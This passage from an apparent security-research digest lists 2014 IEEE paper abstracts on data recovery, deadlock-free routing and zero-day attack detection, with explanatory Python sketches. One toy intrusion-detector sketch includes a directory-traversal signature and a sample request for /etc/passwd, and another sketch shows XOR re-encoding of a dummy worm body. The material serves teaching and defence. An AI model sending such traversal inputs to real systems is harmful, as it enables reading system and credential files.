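          assert file_hash(target) == expected, "backup itself is corrupt"
          return False

    Because the hash database and backups live on physically write-protected media, an attacker who modifies a protected file cannot also adjust the reference hash to hide the change.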
  • Yunfeng Zhu; Lee, P.P.C.; Yinlong Xu; Yuchong Hu; Liping Xiang, "On the Speedup of Recovery in Large-Scale Erasure-Coded Storage Systems," Parallel and Distributed Systems, IEEE Transactions on , vol.25, no.7, pp.1830,1840, July 2014. Modern storage systems stripe redundant data across multiple nodes to provide availability guarantees against node failures. One form of data redundancy is based on XOR-based erasure codes, which use only XOR operations for encoding and decoding. In addition to tolerating failures, a storage system must also provide fast failure recovery to reduce the window of vulnerability. This work addresses the problem of speeding up the recovery of a single-node failure for general XOR-based erasure codes. We propose a replace recovery algorithm, which uses a hill-climbing technique to search for a fast recovery solution, such that the solution search can be completed within a short time period. We further extend the algorithm to adapt to the scenario where nodes have heterogeneous capabilities (e.g., processing power and transmission bandwidth). We implement our replace recovery algorithm atop a parallelized architecture to demonstrate its feasibility. We conduct experiments on a networked storage system testbed, and show that our replace recovery algorithm uses less recovery time than the conventional recovery approach.
    Keywords: fault tolerant computing; storage management; XOR operations; XOR-based erasure codes; availability guarantees; data redundancy; fast recovery solution; hill-climbing technique; large-scale erasure-coded storage systems; networked storage system testbed; node failures; parallelized architecture; replace recovery algorithm; single-node failure recovery; vulnerability window; Algorithm design and analysis; Distributed databases; Encoding; Equations; Generators; Mathematical model; Strips; XOR-coded storage system; recovery algorithm; single-node failure (ID#:14-2242)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6613479&isnumber=6828815
  • Yuankai Chen; Xuan Zeng; Hai Zhou, "Recovery-based resilient latency-insensitive systems," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014, vol., no., pp.1,6, 24-28 March 2014. As interconnect delay becomes a larger fraction of the clock cycle time, the conventional global stalling mechanism, which is used to correct errors in general synchronous circuits, is no longer feasible because of the expensive timing cost for the stalling signal to travel across the circuit. In this paper, we propose recovery-based resilient latency-insensitive systems (RLISs) that efficiently integrate error-recovery techniques with latency-insensitive design to replace global stalling. We first demonstrate a baseline RLIS, as the motivation for our work, that uses an additional output buffer to guarantee that only correct data can enter the output channel. However, this baseline RLIS suffers from performance degradation even when errors do not occur. We propose a novel improved RLIS that allows erroneous data to propagate in the system. Equipped with improved queues that prevent accumulation of erroneous data, the improved RLIS retains the system performance. We provide a theoretical study that analyzes the impact of errors on system performance and the queue sizing problem. We also theoretically prove that the improved RLIS performs no worse than the global stalling mechanism. Experimental results show that the improved RLIS has 40.3% and 3.1% throughput improvements compared to the baseline RLIS and the (infeasible) global stalling mechanism respectively, with less than 10% hardware overhead.
    Keywords: clocks; integrated circuit interconnections; logic circuits; RLIS; clock cycle time; error impact; error-recovery; expensive timing cost; global stalling mechanism; improved queues; interconnect delay; queue sizing problem; recovery-based resilient latency-insensitive systems; stalling signal; synchronous circuits; Clocks; Degradation; Integrated circuit interconnections; Relays; Synchronization; System performance; Throughput (ID#:14-2243)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800317&isnumber=6800201
  • Hong, Bi; Choi, Wan, "Asymptotic Analysis Of Failed Recovery Probability In A Distributed Wireless Storage System With Limited Sum Storage Capacity," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.6459,6463, 4-9 May 2014. In distributed wireless storage systems, failed recovery probability depends on not only wireless channel conditions but also storage size of each distributed storage node. For efficient utilization of limited storage capacity, we asymptotically analyze the failed recovery probability of a distributed wireless storage system with a sum storage capacity constraint when signal-to-noise ratio goes to infinity, and find the optimal storage allocation strategy across distributed storage nodes in terms of the asymptotic failed recovery probability. It is also shown that when the number of storage nodes is sufficiently large the storage size required at each node is not so large for high exponential order of the failed recovery probability.
    Keywords: Distributed storage system; failed recovery; maximum distance separable coding; wireless storage (ID#:14-2244)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854848&isnumber=6853544
  • Sun, J.; Liao, H.; Upadhyaya, B.R., "A Robust Functional-Data-Analysis Method for Data Recovery in Multichannel Sensor Systems," Cybernetics, IEEE Transactions on, vol.44, no.8, pp.1420,1431, Aug. 2014. Multichannel sensor systems are widely used in condition monitoring for effective failure prevention of critical equipment or processes. However, loss of sensor readings due to malfunctions of sensors and/or communication has long been a hurdle to reliable operations of such integrated systems. Moreover, asynchronous data sampling and/or limited data transmission are usually seen in multiple sensor channels. To reliably perform fault diagnosis and prognosis in such operating environments, a data recovery method based on functional principal component analysis (FPCA) can be utilized. However, traditional FPCA methods are not robust to outliers and their capabilities are limited in recovering signals with strongly skewed distributions (i.e., lack of symmetry). This paper provides a robust data-recovery method based on functional data analysis to enhance the reliability of multichannel sensor systems. The method not only considers the possibly skewed distribution of each channel of signal trajectories, but is also capable of recovering missing data for both individual and correlated sensor channels with asynchronous data that may be sparse as well. In particular, grand median functions, rather than classical grand mean functions, are utilized for robust smoothing of sensor signals. Furthermore, the relationship between the functional scores of two correlated signals is modeled using multivariate functional regression to enhance the overall data-recovery capability. An experimental flow-control loop that mimics the operation of coolant-flow loop in a multimodular integral pressurized water reactor is used to demonstrate the effectiveness and adaptability of the proposed data-recovery method. The computational results illustrate that the proposed method is robust to outliers and more capable than the existing FPCA-based method in terms of the accuracy in recovering strongly skewed signals. In addition, turbofan engine data are also analyzed to verify the capability of the proposed method in recovering non-skewed signals.
    Keywords: Bandwidth; Data models; Eigenvalues and eigenfunctions; Predictive models; Robustness; Sensor systems; Sun; Asynchronous data; condition monitoring; data recovery; robust functional principal component analysis (ID#:14-2245)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6670785&isnumber=6856256
  • Nower, N.; Yasuo Tan; Lim, AO., "Efficient Temporal and Spatial Data Recovery Scheme for Stochastic and Incomplete Feedback Data of Cyber-physical Systems," Service Oriented System Engineering (SOSE), 2014 IEEE 8th International Symposium on, vol., no., pp.192,197, 7-11 April 2014. Feedback loss can severely degrade overall system performance; in addition, it can affect the control and computation of Cyber-physical Systems (CPS). CPS hold enormous potential for a wide range of emerging applications, including those with stochastic and time-critical traffic patterns. Stochastic data has an inherent randomness that makes it a great challenge to maintain real-time control whenever data is lost. In this paper, we propose a data recovery scheme, called the Efficient Temporal and Spatial Data Recovery (ETSDR) scheme, for stochastic incomplete feedback in CPS. In this scheme, we identify the temporal model based on the traffic patterns and consider the spatial effect of the nearest neighbor. Numerical results reveal that the proposed ETSDR outperforms both weighted prediction (WP) and the exponentially weighted moving average (EWMA) algorithm, regardless of the percentage of missing data, in terms of the root mean square error, the mean absolute error, and the integral of absolute error.
    Keywords: data handling; mean square error methods; stochastic processes; CPS; ETSDR scheme; cyber-physical systems; efficient temporal and spatial data recovery; feedback loss; incomplete feedback data; integral of absolute error; mean absolute error; nearest neighbor; real-time control; root mean square error; spatial data recovery scheme; stochastic feedback data; stochastic incomplete feedback; stochastic traffic patterns; system performance; temporal data recovery scheme; temporal model identification; time-critical traffic patterns; Computational modeling; Correlation; Data models; Mathematical model; Measurement uncertainty; Spatial databases; Stochastic processes; auto regressive integrated moving average; cyber-physical system; data recovery scheme; spatial correlation; stochastic data; temporal correlation (ID#:14-2246)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830905&isnumber=6825948
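    For readers unfamiliar with the EWMA baseline the authors compare against, the sketch below imputes lost feedback samples with an exponentially weighted moving average; ETSDR itself additionally fits a temporal model to the traffic pattern and uses nearest-neighbor spatial correlation, which this sketch does not attempt:

      # EWMA imputation: when a feedback sample is lost (None), substitute the
      # exponentially weighted moving average of the samples seen so far.
      def ewma_impute(samples, alpha=0.3):
          """samples: iterable of floats, with None marking lost feedback."""
          est, out = None, []
          for x in samples:
              if x is None:                # feedback lost: use current estimate
                  out.append(est)
              else:                        # feedback received: update estimate
                  est = x if est is None else alpha * x + (1 - alpha) * est
                  out.append(x)
          return out

      print(ewma_impute([1.0, 1.2, None, 1.4, None, None]))

    A larger alpha tracks recent samples more aggressively; a smaller alpha smooths more, which is exactly the trade-off that makes a fixed EWMA weaker than a fitted temporal model on stochastic traffic.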
  • Kyoungwoo Heo, "An Accumulated Loss Recovery Algorithm on Overlay Multicast System Using Fountain Codes," Information Science and Applications (ICISA), 2014 International Conference on, vol., no., pp.1,3, 6-9 May 2014. In this paper, we propose an accumulated loss recovery algorithm for an overlay multicast system using Fountain codes. A Fountain code successfully decodes through packet loss, but it is weak against losses that accumulate along a multicast tree. The proposed algorithm overcomes accumulated losses and significantly reduces delay on the overlay multicast tree.
    Keywords: error correction codes; multicast communication; overlay networks; packet radio networks; trees (mathematics); Fountain codes; accumulated loss recovery algorithm; delay reduction; overlay multicast system; overlay multicast tree; packet loss decoding; Decoding; Delays; Encoding; Overlay networks; Packet loss; Simulation (ID#:14-2247)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847353&isnumber=6847317
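    As background, here is a toy fountain (LT-style) encoder and peeling decoder in Python; the degree distribution is ad hoc and the paper's tree-level accumulated-loss handling is not modeled:

      import random

      # Toy fountain coding: each encoded droplet is the XOR of a random
      # subset of source blocks; a peeling decoder recovers the source from
      # any sufficiently large set of received droplets, whatever was lost.
      random.seed(1)
      source = [random.randrange(256) for _ in range(8)]   # 8 source blocks

      def droplet():
          idx = random.sample(range(len(source)), random.choice([1, 2, 3]))
          val = 0
          for i in idx:
              val ^= source[i]
          return set(idx), val

      received = [droplet() for _ in range(30)]            # post-loss survivors
      decoded = {}
      progress = True
      while progress and len(decoded) < len(source):
          progress = False
          for idx, val in received:
              pending = idx - decoded.keys()
              if len(pending) == 1:                        # degree-1: peel it
                  i = pending.pop()
                  for j in idx - {i}:
                      val ^= decoded[j]                    # strip known blocks
                  if i not in decoded:
                      decoded[i] = val
                      progress = True
      print("decoded", len(decoded), "of", len(source), "blocks")

    The rateless property is what makes the codes loss-tolerant at a single hop; the paper's contribution is handling the case where each overlay hop loses a different subset, so losses compound down the tree.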
  • Beraud-Sudreau, Q.; Begueret, J.-B.; Mazouffre, O.; Pignol, M.; Baguena, L.; Neveu, C.; Deval, Y.; Taris, T., "SiGe Clock and Data Recovery System Based on Injection-Locked Oscillator for 100 Gbit/s Serial Data Link," Solid-State Circuits, IEEE Journal of, vol. PP, no.99, pp.1,10, 30 April 2014. Clock and data recovery (CDR) systems are the first logic blocks in serial data receivers, and the latter's performance depends on the CDR. In this paper, a 100 Gbit/s CDR designed in 130 nm BiCMOS SiGe is presented. The CDR uses an injection-locked oscillator (ILO) which delivers the 100 GHz clock. The inherent phase shift between the recovered clock and the incoming data is compensated by a feedback loop which performs phase and frequency tracking. Furthermore, a windowed phase comparator has been used, first to lower the classical number of gates in order to prevent any delay skews between the different phase detector blocks, then to decrease the phase comparator operating frequency, and furthermore to extend the ability to track zero bit patterns. The measurement results demonstrate a 100 GHz clock signal extracted from 50 Gb/s input data, with a phase noise as low as -98 dBc/Hz at 100 kHz offset from the carrier frequency. The rms jitter of the 25 GHz recovered data is only 1.2 ps. The power consumption is 1.4 W under a 2.3 V power supply.
    Keywords: 100 Gb/s; BiCMOS SiGe ;clock and data recovery (CDR); injection-locked oscillator (ILO); millimeter-wave data communication; phase comparator; phase-locked loop (PLL) (ID#:14-2248)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6808420&isnumber=4359912
  • Xinhai Zhang; Persson, M.; Nyberg, M.; Mokhtari, B.; Einarson, A; Linder, H.; Westman, J.; DeJiu Chen; Torngren, M., "Experience on Applying Software Architecture Recovery To Automotive Embedded Systems," Software Maintenance, Reengineering and Reverse Engineering (CSMR-WCRE), 2014 Software Evolution Week - IEEE Conference on, vol., no., pp.379,382, 3-6 Feb. 2014. The importance and potential advantages of a comprehensive product architecture description are well described in the literature. However, developing such a description takes additional resources, and it is difficult to maintain consistency with evolving implementations. This paper presents an approach and industrial experience based on architecture recovery from source code at the truck manufacturer Scania CV AB. The extracted representation of the architecture is presented in several views and verified at the CAN signal level. Lessons learned are discussed.
    Keywords: automobile industry; embedded systems; software architecture; source code (software); CAN signal level; Scania CV AB; automotive embedded systems; comprehensive product architecture description; extracted representation; software architecture recovery; source code; truck manufacturer; Automotive engineering; Browsers; Computer architecture; Databases; Embedded systems; Software architecture; architecture recovery; automotive industry; distributed embedded systems; software engineering (ID#:14-2249)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6747199&isnumber=6747152
  • Xiang Zhou, "Efficient Clock and Carrier Recovery Algorithms for Single-Carrier Coherent Optical Systems: A systematic review on challenges and recent progress," Signal Processing Magazine, IEEE , vol.31, no.2, pp.35,45, March 2014. This article presents a systematic review on the challenges and recent progress of timing and carrier synchronization techniques for high-speed optical transmission systems using single-carrier-based coherent optical modulation formats.
    Keywords: optical communication; optical modulation; synchronization; carrier recovery algorithm; carrier synchronization technique; clock recovery algorithm; high-speed optical transmission system; single-carrier-based coherent optical modulation format; timing synchronization technique; Clocks; Digital signal processing; High-speed optical techniques; Optical distortion; Optical receivers; Optical signal processing; Signal processing algorithms; Timing (ID#:14-2250)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6739185&isnumber=6739177
  • Stephens, B.; Cox, AL.; Singla, A; Carter, J.; Dixon, C.; Felter, W., "Practical DCB For Improved Data Center Networks," INFOCOM, 2014 Proceedings IEEE, vol., no., pp.1824,1832, April 27 2014-May 2 2014. Storage area networking is driving commodity data center switches to support lossless Ethernet (DCB). Unfortunately, to enable DCB for all traffic on arbitrary network topologies, we must address several problems that can arise in lossless networks, e.g., large buffering delays, unfairness, head of line blocking, and deadlock. We propose TCP-Bolt, a TCP variant that not only addresses the first three problems but reduces flow completion times by as much as 70%. We also introduce a simple, practical deadlock-free routing scheme that eliminates deadlock while achieving aggregate network throughput within 15% of ECMP routing. This small compromise in potential routing capacity is well worth the gains in flow completion time. We note that our results on deadlock-free routing are also of independent interest to the storage area networking community. Further, as our hardware testbed illustrates, these gains are achievable today, without hardware changes to switches or NICs.
    Keywords: computer centers; local area networks; routing protocols; switching networks; telecommunication network topology; telecommunication traffic; transport protocols; DCB; ECMP routing; NIC; TCP-Bolt; arbitrary network topology traffic; buffering delay; commodity data center switch; data center bridging; deadlock-free routing scheme; improved data center network; head of line blocking; lossless Ethernet; storage area networking; Hardware; Ports (Computers); Routing; System recovery; Throughput; Topology; Vegetation (ID#:14-2251)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6848121&isnumber=6847911
  • Chieh-Hao Chang; Jung-Chun Kao; Fu-Wen Chen; Shih Hsun Cheng, "Many-to-All Priority-Based Network-Coding Broadcast In Wireless Multihop Networks," Wireless Telecommunications Symposium (WTS), 2014 , vol., no., pp.1,6, 9-11 April 2014. This paper addresses the minimum transmission broadcast (MTB) problem for the many-to-all scenario in wireless multihop networks and presents a network-coding broadcast protocol with priority-based deadlock prevention. Our main contributions are as follows: First, we relate the many-to-all-with-network-coding MTB problem to a maximum out-degree problem. The solution of the latter can serve as a lower bound for the number of transmissions. Second, we propose a distributed network-coding broadcast protocol, which constructs efficient broadcast trees and dictates nodes to transmit packets in a network coding manner. Besides, we present the priority-based deadlock prevention mechanism to avoid deadlocks. Simulation results confirm that compared with existing protocols in the literature and the performance bound we present, our proposed network-coding broadcast protocol performs very well in terms of the number of transmissions.
    Keywords: network coding; protocols; radio networks; telecommunication network topology; trees (mathematics); broadcast trees; distributed many-to-all priority-based network-coding broadcast protocol; energy efficiency; many-to-all-with-network-coding MTB problem; maximum out-degree problem; minimum transmission broadcast problem; packet transmission; priority-based deadlock prevention; wireless multihop networks; Encoding; Network coding; Protocols; System recovery; Topology; Vectors; Wireless communication; broadcast; energy efficiency; network coding; wireless networks (ID#:14-2252)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6835020&isnumber=6834983
  • Verbeek, F.; Schmaltz, J., "A Decision Procedure for Deadlock-Free Routing in Wormhole Networks," Parallel and Distributed Systems, IEEE Transactions on , vol.25, no.8, pp.1935,1944, Aug. 2014. Deadlock freedom is a key challenge in the design of communication networks. Wormhole switching is a popular switching technique, which is also prone to deadlocks. Deadlock analysis of routing functions is a manual and complex task. We propose an algorithm that automatically proves routing functions deadlock-free or outputs a minimal counter-example explaining the source of the deadlock. Our algorithm is the first to automatically check a necessary and sufficient condition for deadlock-free routing. We illustrate its efficiency in a complex adaptive routing function for torus topologies. Results are encouraging. Deciding deadlock freedom is co-NP-Complete for wormhole networks. Nevertheless, our tool proves a 13 x 13 torus deadlock-free within seconds. Finding minimal deadlocks is more difficult. Our tool needs four minutes to find a minimal deadlock in a 11 x 11 torus while it needs nine hours for a 12 x 12 network.
    Keywords: computational complexity; computer networks; integer programming; linear programming; telecommunication network routing; telecommunication network topology; adaptive routing function; co-NP-complete problem; communication network design; deadlock freedom; deadlock-free routing; decision procedure; necessary condition; routing functions; sufficient condition; torus topologies; wormhole networks; wormhole switching technique; Design methodology; Grippers; Network topology; Routing; Switches; System recovery; Topology; Communication networks; automatic verification; deadlocks; formal methods; routing protocols (ID#:14-2253)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6564261&isnumber=6853425
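    The classic result behind such tools is the Dally-Seitz theorem: a deterministic routing function is deadlock-free if and only if its channel dependency graph is acyclic (the adaptive-routing condition the paper decides is subtler). The sketch below runs the basic acyclicity check on a hand-made dependency graph standing in for one extracted from a real network:

      # Channel dependency graph check: each channel points to the channels a
      # packet holding it may wait on next; a cycle means possible deadlock.
      def has_cycle(deps):
          """deps: dict mapping each channel to the channels it can wait on."""
          WHITE, GRAY, BLACK = 0, 1, 2
          color = {c: WHITE for c in deps}
          def dfs(c):
              color[c] = GRAY
              for nxt in deps.get(c, ()):
                  if color.get(nxt, WHITE) == GRAY:
                      return True                     # back edge: cycle found
                  if color.get(nxt, WHITE) == WHITE and dfs(nxt):
                      return True
              color[c] = BLACK
              return False
          return any(color[c] == WHITE and dfs(c) for c in deps)

      # A 4-node unidirectional ring with naive minimal routing can deadlock:
      ring = {"c0": ["c1"], "c1": ["c2"], "c2": ["c3"], "c3": ["c0"]}
      print("ring deadlock-free:", not has_cycle(ring))    # False

      # Breaking the cycle (e.g., with a dateline virtual channel) fixes it:
      fixed = {"c0": ["c1"], "c1": ["c2"], "c2": ["c3"], "c3": []}
      print("fixed deadlock-free:", not has_cycle(fixed))  # True

    The hard part, and the paper's subject, is deciding the analogous property automatically when routing is adaptive and wormhole flow control lets a packet hold several channels at once.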
  • Hardy, T.L., "Resilience: A holistic safety approach," Reliability and Maintainability Symposium (RAMS), 2014 Annual , vol., no., pp.1,6, 27-30 Jan. 2014. Decreasing the potential for catastrophic consequences poses a significant challenge for high-risk industries. Organizations are under many different pressures, and they are continuously trying to adapt to changing conditions and recover from disturbances and stresses that can arise from both normal operations and unexpected events. Reducing risks in complex systems therefore requires that organizations develop and enhance traits that increase resilience. Resilience provides a holistic approach to safety, emphasizing the creation of organizations and systems that are proactive, interactive, reactive, and adaptive. This approach relies on disciplines such as system safety and emergency management, but also requires that organizations develop indicators and ways of knowing when an emergency is imminent. A resilient organization must be adaptive, using hands-on activities and lessons learned efforts to better prepare it to respond to future disruptions. It is evident from the discussions of each of the traits of resilience, including their limitations, that there are no easy answers to reducing safety risks in complex systems. However, efforts to strengthen resilience may help organizations better address the challenges associated with the ever-increasing complexities of their systems.
    Keywords: emergency management; large-scale systems; reliability; risk management; safety; system recovery; complex systems; emergency management; high-risk industries; holistic safety approach; resilience; system recovery; system risk reduction; system safety; Accidents; Hazards; Organizations; Personnel; Resilience; Systematics; emergency management; resilience; system safety (ID#:14-2254)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798494&isnumber=6798433

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Zero Day Attacks

Zero Day Attacks



Zero-day attacks exploit previously unknown vulnerabilities in software that programmers have not yet patched or fixed. Detection, protection, and correction are all necessary for reducing the consequences of such attacks, and research is finding methods for all three. Here, we cite works published in the first six months of 2014 addressing zero-day attacks.

  • Holm, H., "Signature Based Intrusion Detection for Zero-Day Attacks: (Not) A Closed Chapter?," 2014 47th Hawaii International Conference on System Sciences (HICSS), pp. 4895-4904, 6-9 Jan. 2014. A frequent claim that has not been validated is that signature based network intrusion detection systems (SNIDS) cannot detect zero-day attacks. This paper studies this property by testing 356 severe attacks on the SNIDS Snort, configured with an old official rule set. Of these attacks, 183 are zero-days to the rule set and 173 are theoretically known to it. The results from the study show that Snort clearly is able to detect zero-days (a mean of 17% detection). The detection rate is, however, greater overall for theoretically known attacks (a mean of 54% detection). The paper then investigates how the zero-days are detected, how prone the corresponding signatures are to false alarms, and how easily they can be evaded. Analyses of these aspects suggest that a conservative estimate of zero-day detection by Snort is 8.2%.
    Keywords: computer network security; digital signatures; SNIDS; false alarm; signature based network intrusion detection; zero day attacks; zero day detection; Computer architecture; Payloads; Ports (Computers); Reliability; Servers; Software; Testing; Computer security; NIDS; code injection; exploits (ID#:14-2255)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759203&isnumber=6758592
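
The mechanism Holm evaluates can be pictured in a few lines: a signature engine flags any payload containing a known byte pattern, so generic patterns written for past attacks can incidentally catch some zero-days, while attack-specific patterns cannot. The toy signatures and payloads below are invented and bear no relation to Snort's actual rule language or matching engine.

```python
# Toy signature matcher, invented for illustration -- not Snort's engine or
# rule language. A "signature" here is just a byte pattern to search for.

SIGNATURES = {
    "generic-dir-traversal": b"../../",                    # generic pattern
    "known-exploit-xyz":     b"\x90\x90\x90\x90\xeb\x1f",  # tuned to one exploit
}

def detect(payload: bytes):
    """Names of all signatures whose pattern occurs in the payload."""
    return [name for name, pat in SIGNATURES.items() if pat in payload]

attacks = {
    "known_attack": b"GET /cgi-bin/x?\x90\x90\x90\x90\xeb\x1f HTTP/1.0",
    "zero_day_a":   b"GET /../../etc/passwd HTTP/1.0",       # new exploit, old pattern
    "zero_day_b":   b"POST /api HTTP/1.1 \xde\xad\xbe\xef",  # evades everything
}

hits = {name: detect(p) for name, p in attacks.items()}
rate = sum(bool(h) for h in hits.values()) / len(attacks)
print(hits)
print(f"overall detection rate: {rate:.0%}")  # 2 of 3 here; real rates are lower
```
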
  • Pandey, Sudhir Kumar; Mehtre, B.M., "A Lifecycle Based Approach for Malware Analysis," 2014 Fourth International Conference on Communication Systems and Network Technologies (CSNT), pp. 767-771, 7-9 April 2014. Most detection approaches, such as signature-based, anomaly-based, and specification-based, are not able to analyze and detect all types of malware. The signature-based approach to malware detection has one major drawback: it cannot detect zero-day attacks. The fundamental limitation of the anomaly-based approach is its high false alarm rate, and specification-based detection often has difficulty specifying completely and accurately the entire set of valid behaviors a malware should exhibit. Modern malware developers try to avoid detection using several techniques, such as polymorphism, metamorphism, and various hiding techniques. In order to overcome these issues, we propose a new approach for malware analysis and detection consisting of the following twelve stages: Inbound Scan, Inbound Attack, Spontaneous Attack, Client-Side Exploit, Egg Download, Device Infection, Local Reconnaissance, Network Surveillance, Communications, Peer Coordination, Attack Preparation, and Malicious Outbound Propagation. These stages integrate as an interrelated process in our proposed approach. The approach addresses the limitations of all three detection approaches by monitoring the behavioral activity of malware at each and every stage of its life cycle and then reporting on the maliciousness of the files or software.
    Keywords: Computers; Educational institutions; Malware; Monitoring; Reconnaissance; Malware; Metamorphic; Polymorphic; Reconnaissance; Signature based; Zero day attack (ID#:14-2256)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821503&isnumber=6821334
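
To make the lifecycle idea concrete, here is a minimal sketch of a monitor that records which of the paper's twelve stages have been observed for a given host or file. The monitor class, the event stream, and the naive fraction-of-stages score are our own illustrative choices; the paper integrates the stages as an interrelated process rather than a simple counter.

```python
# Minimal sketch of lifecycle-based tracking. The twelve stage names come from
# the paper's abstract; everything else here is invented for illustration.

LIFECYCLE_STAGES = [
    "Inbound Scan", "Inbound Attack", "Spontaneous Attack", "Client-Side Exploit",
    "Egg Download", "Device Infection", "Local Reconnaissance",
    "Network Surveillance", "Communications", "Peer Coordination",
    "Attack Preparation", "Malicious Outbound Propagation",
]

class LifecycleMonitor:
    """Records which lifecycle stages have been observed for one host or file."""

    def __init__(self):
        self.observed = set()

    def record(self, stage: str):
        if stage not in LIFECYCLE_STAGES:
            raise ValueError(f"unknown stage: {stage}")
        self.observed.add(stage)

    def maliciousness(self) -> float:
        """Naive score: fraction of the twelve stages observed so far."""
        return len(self.observed) / len(LIFECYCLE_STAGES)

monitor = LifecycleMonitor()
for event in ["Inbound Scan", "Client-Side Exploit", "Egg Download", "Device Infection"]:
    monitor.record(event)
print(f"maliciousness: {monitor.maliciousness():.2f}")  # 4 of 12 stages -> 0.33
```
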
  • Kaur, R.; Singh, M., "A Survey on Zero-Day Polymorphic Worm Detection Techniques," IEEE Communications Surveys & Tutorials, vol. PP, no. 99, pp. 1-30, March 2014. Zero-day polymorphic worms pose a serious threat to Internet security. With their ability to propagate rapidly, these worms increasingly threaten Internet hosts and services. Not only can they exploit unknown vulnerabilities, they can also change their own representations on each new infection or encrypt their payloads using a different key per infection. The same worm thus has many signature variations, making fingerprinting very difficult. Therefore, signature-based defenses and traditional security layers miss these stealthy and persistent threats. This paper provides a detailed survey outlining the research efforts on detection of modern zero-day malware in the form of zero-day polymorphic worms.
    Keywords: Grippers; Internet; Malware; Monitoring; Payloads; Vectors; Detection Systems; Polymorphic worms; Signature Generation; Zero-day attacks; Zero-day malware (ID#:14-2257)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6766917&isnumber=5451756
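
A short demonstration shows why per-infection payload encoding defeats exact byte signatures, which is the core difficulty the survey addresses. The worm body, the one-byte XOR scheme, and the prepended key byte below are deliberately simplistic stand-ins for real polymorphic engines.

```python
# Toy polymorphism demo: the same worm body produces different bytes on each
# infection, so an exact-match signature for the body never fires. The body,
# the one-byte XOR scheme, and the "decryptor stub" are invented placeholders.
import os

BODY = b"WORM-CORE-LOGIC"        # stand-in for a worm's invariant logic
SIGNATURE = BODY                 # exact-match signature for that body

def polymorphic_copy(body: bytes) -> bytes:
    key = os.urandom(1)[0] | 1   # fresh nonzero key per infection
    encoded = bytes(b ^ key for b in body)
    return bytes([key]) + encoded  # a real worm would prepend a decoder stub

copies = [polymorphic_copy(BODY) for _ in range(3)]
print([SIGNATURE in c for c in copies])  # [False, False, False]
```
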
  • Lingyu Wang; Jajodia, S.; Singhal, A.; Pengsu Cheng; Noel, S., "k-Zero Day Safety: A Network Security Metric for Measuring the Risk of Unknown Vulnerabilities," IEEE Transactions on Dependable and Secure Computing, vol. 11, no. 1, pp. 30-44, Jan.-Feb. 2014. By enabling a direct comparison of different security solutions with respect to their relative effectiveness, a network security metric may provide quantifiable evidence to assist security practitioners in securing computer networks. However, research on security metrics has been hindered by difficulties in handling zero-day attacks exploiting unknown vulnerabilities. In fact, the security risk of unknown vulnerabilities has been considered unmeasurable due to the less predictable nature of software flaws. This causes a major difficulty for security metrics, because a more secure configuration would be of little value if it were equally susceptible to zero-day attacks. In this paper, we propose a novel security metric, k-zero day safety, to address this issue. Instead of attempting to rank unknown vulnerabilities, our metric counts how many such vulnerabilities would be required to compromise network assets; a larger count implies more security, because the likelihood of having more unknown vulnerabilities available, applicable, and exploitable all at the same time will be significantly lower. We formally define the metric, analyze the complexity of computing it, devise heuristic algorithms for intractable cases, and finally demonstrate through case studies that applying the metric to existing network security practices may generate actionable knowledge.
    Keywords: computer network security; computational complexity; heuristic algorithms; k zero day safety; network security metric; software flaws; Security metrics; attack graph; network hardening; network security (ID#:14-2258)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6529081&isnumber=6732792
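
The counting idea behind the metric can be sketched directly: model the network as an attack graph whose edges are labeled with the unknown vulnerability, if any, they require, and take k to be the minimum number of distinct zero-day vulnerabilities over all attack paths to the asset. The graph, exploit labels, and brute-force search below are invented toys; the paper formally defines the metric and supplies heuristics for the intractable cases.

```python
# Hedged sketch of the k-zero-day counting idea -- not the paper's formal
# metric or its heuristic algorithms. Hosts, edges, and zero-day labels are
# invented: each edge is (src, dst, zero_day_needed), with None meaning the
# hop needs no unknown vulnerability.

EDGES = [
    ("attacker", "web", "zd_web"),   # requires an unknown web-server flaw
    ("web",      "app", None),       # known/credentialed hop
    ("app",      "db",  "zd_db"),    # requires an unknown database flaw
    ("attacker", "vpn", "zd_vpn"),
    ("vpn",      "db",  "zd_db"),    # same database flaw: counted only once
]

def k_zero_day(edges, source, target):
    """Minimum number of distinct zero-days over all simple attack paths."""
    adj = {}
    for s, d, zd in edges:
        adj.setdefault(s, []).append((d, zd))

    best = float("inf")             # stays inf if the asset is unreachable

    def dfs(node, used, visited):
        nonlocal best
        if len(used) >= best:       # prune: this path cannot improve on best
            return
        if node == target:
            best = len(used)
            return
        for nxt, zd in adj.get(node, []):
            if nxt not in visited:
                dfs(nxt, used | ({zd} if zd else set()), visited | {nxt})

    dfs(source, frozenset(), {source})
    return best

print(k_zero_day(EDGES, "attacker", "db"))  # 2, e.g. zd_vpn plus zd_db
```
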

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Lablet Activities

Lablet Activities


This section contains information on recent Lablet activities.

(ID#:14-3361)


Note:

